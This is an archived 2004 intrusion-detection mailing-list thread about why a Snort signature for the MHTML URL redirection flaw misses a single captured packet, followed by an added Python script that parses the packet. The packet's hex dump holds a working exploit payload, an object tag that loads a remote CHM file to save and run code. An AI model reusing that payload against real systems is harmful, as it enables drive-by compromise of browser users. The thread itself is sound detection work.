[Intrusions] mhtml signature
Meidinger Chris
chris.meidinger at badenit.de
Wed Aug 4 18:45:37 GMT 2004
Well Lola,
looking at the nature of the exploit - it comes either in an email message
in an established smtp connection, or as html in an established http
connection - it seems like it would be harmless outside of the context of an
established tcp connection.
connectionless exploits will most likely have at least one of the following
attributes:
1. attack ip protocol 6 (tcp) itself, rather than the encapsulated data
payload (attack osi layers 1-4 but not 5-7)
2. attack another ip protocol (for example protocol 17, udp, which is
connectionless)
3. attack the ip stack itself (mangle some packet fields to fubar the ip
stack)
4. are local attacks, and have nothing to do with the network.
Cheers,
Chris
> -----Original Message-----
> From: intrusions-bounces at lists.sans.org
> [mailto:intrusions-bounces at lists.sans.org] On Behalf Of lola marais
> Sent: Wednesday, August 04, 2004 2:18 PM
> To: intrusions at lists.sans.org
> Subject: [Intrusions] mhtml signature
>
> I have been working on a problem and require the assistance
> of the broader list community.
> Credit is given to the owner of this signature at
> http://sourceforge.net/mailarchive/message.php?msg_id=7758516
>
>
> I am planning on using this signature for a detect in part 2
> of my GCIA practical.
>
> The problem is that I am not able to get it working 100% with
> the data that I have. By not working I mean that it will miss
> the single packet that I have captured.
>
> I have captured some data from a network using tcpdump. The
> capture contains the data content required to trigger the
> event. The capture contains a single packet for that session, no more.
>
> When I read the data past snort with the signature enabled,
> then NO alerts are triggered. If I remove the part of the
> signature "flow:from_server,established" and then pass the
> same data I have 1 event.
>
> The signature looks for an established connection.
> My question is:
>
> 1. Why has the author of the signature decided to look for an
> established connection?
> 2. Does the signature stand a chance of missing some events
> by looking only for established connections?
>
> The current version of the signature has the following structure.
>
> alert tcp any any -> $HOME_NET any (msg:"Microsoft MTHML URL
> Redirection Attempt"; flow:from_server,established;
> content:"mhtml|3A|file|3A|"; nocase;
> reference:cve,CAN-2004-0380;
> reference:url,www.microsoft.com/technet/security/.../MS04-013.mspx;
> classtype:web-application-attack; rev:2;)
>
> The data packet that I have captured looks as follows:
>
> 07/28/04-11:23:51.262652 MAC:removed -> MAC:removed
> type:0x800 len:0xC2 Proxy:ProxyPort -> InternalHost:4003 TCP
> TTL:63 TOS:0x0 ID:33030 IpLen:20
> DgmLen:176 DF
> ***AP**F Seq: 0xDC274ADF Ack: 0x2B3B3965 Win: 0xC1E8 TcpLen: 20
> 0x0000: 00 0A 42 42 80 0A 00 03 32 87 9A 71 08 00 45 00  ..BB....2..q..E.
> 0x0010: 00 B0 81 06 40 00 3F 06 2B 92 9E A9 83 0D 9E A6  ....@.?.+.......
> 0x0020: CE 52 1F 4C 0F A3 DC 27 4A DF 2B 3B 39 65 50 19  .R.L...'J.+;9eP.
> 0x0030: C1 E8 70 F3 00 00 20 20 20 20 3C 6F 62 6A 65 63  ..p...    <objec
> 0x0040: 74 20 64 61 74 61 3D 22 26 23 31 30 39 3B 73 2D  t data="ms-
> 0x0050: 69 74 73 3A 6D 68 74 6D 6C 3A 66 69 6C 65 3A 2F  its:mhtml:file:/
> 0x0060: 2F 43 3A 5C 66 6F 6F 2E 6D 68 74 21 68 74 74 70  /C:\foo.mht!http
> 0x0070: 3A 2F 2F 77 77 77 2E 66 72 65 65 33 32 2E 63 6F  ://www.<blocked> free32.co
> 0x0080: 6D 2F 50 4F 50 2E 43 48 4D 3A 3A 2F 73 61 76 65  m/POP.CHM::/save
> 0x0090: 61 6E 64 72 75 6E 2E 68 74 6D 22 20 74 79 70 65  andrun.htm" type
> 0x00A0: 3D 22 74 65 78 74 2F 78 2D 73 63 72 69 70 74 6C  ="text/x-scriptl
> 0x00B0: 65 74 22 3E 3C 2F 6F 62 6A 65 63 74 3E 20 D1 7F  et"></object> ..
> 0x00C0: CA 27                                            .'
>
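An added example, not from either post and not Snort's code: a short Python script that decodes the packet above from its hex dump, applies the rule's content match, and models why flow:established cannot be satisfied when the capture holds no handshake. The session tracker is my own simplification, assumed for illustration; Snort's stream preprocessor is richer and configurable.

```python
import struct

# The single packet from the post, transcribed from its hex dump: 194 bytes of
# Ethernet + IPv4 + TCP + HTML payload, followed by a 4-byte frame trailer.
FRAME = bytes.fromhex(
    "000a4242800a000332879a7108004500" "00b0810640003f062b929ea9830d9ea6"
    "ce521f4c0fa3dc274adf2b3b39655019" "c1e870f30000202020203c6f626a6563"
    "7420646174613d2226233130393b732d" "6974733a6d68746d6c3a66696c653a2f"
    "2f433a5c666f6f2e6d68742168747470" "3a2f2f7777772e6672656533322e636f"
    "6d2f504f502e43484d3a3a2f73617665" "616e6472756e2e68746d222074797065"
    "3d22746578742f782d7363726970746c" "6574223e3c2f6f626a6563743e20d17f"
    "ca27")
FIN, SYN, PSH, ACK = 0x01, 0x02, 0x08, 0x10
CONTENT = b"mhtml:file:"   # the rule's content:"mhtml|3A|file|3A|" with |3A| decoded

def parse_frame(frame):
    """Return ports, TCP flags and payload of an Ethernet/IPv4/TCP frame."""
    assert frame[12:14] == b"\x08\x00", "not IPv4"
    ip = frame[14:]
    ihl = (ip[0] & 0x0F) * 4
    dgm_len = struct.unpack("!H", ip[2:4])[0]     # DgmLen:176 in the dump
    assert ip[9] == 6, "not TCP"
    tcp = ip[ihl:dgm_len]                         # excludes the frame trailer
    sport, dport, _seq, _ack, off_flags = struct.unpack("!HHIIH", tcp[:14])
    data_off = (off_flags >> 12) * 4
    return {"sport": sport, "dport": dport, "flags": off_flags & 0x1FF,
            "payload": tcp[data_off:]}

def content_matches(payload):
    """The rule's content match; 'nocase' means a case-insensitive compare."""
    return CONTENT in payload.lower()

def flow_established(packets):
    """Toy session tracker (my simplification, not Snort's stream code): a flow
    counts as established only after a SYN and the answering SYN/ACK were seen.
    A capture holding one mid-stream PSH/ACK/FIN packet never gets there."""
    syn_seen = synack_seen = False
    for p in packets:
        if p["flags"] & SYN and not p["flags"] & ACK:
            syn_seen = True
        elif p["flags"] & SYN and p["flags"] & ACK and syn_seen:
            synack_seen = True
    return syn_seen and synack_seen

def rule_fires(packets, require_established=True):
    """Evaluate the rule's flow and content options over a whole capture."""
    if require_established and not flow_established(packets):
        return False
    return any(content_matches(p["payload"]) for p in packets)
```

Running rule_fires on the lone packet returns False with the flow option and True without it, which is the behaviour the post reports.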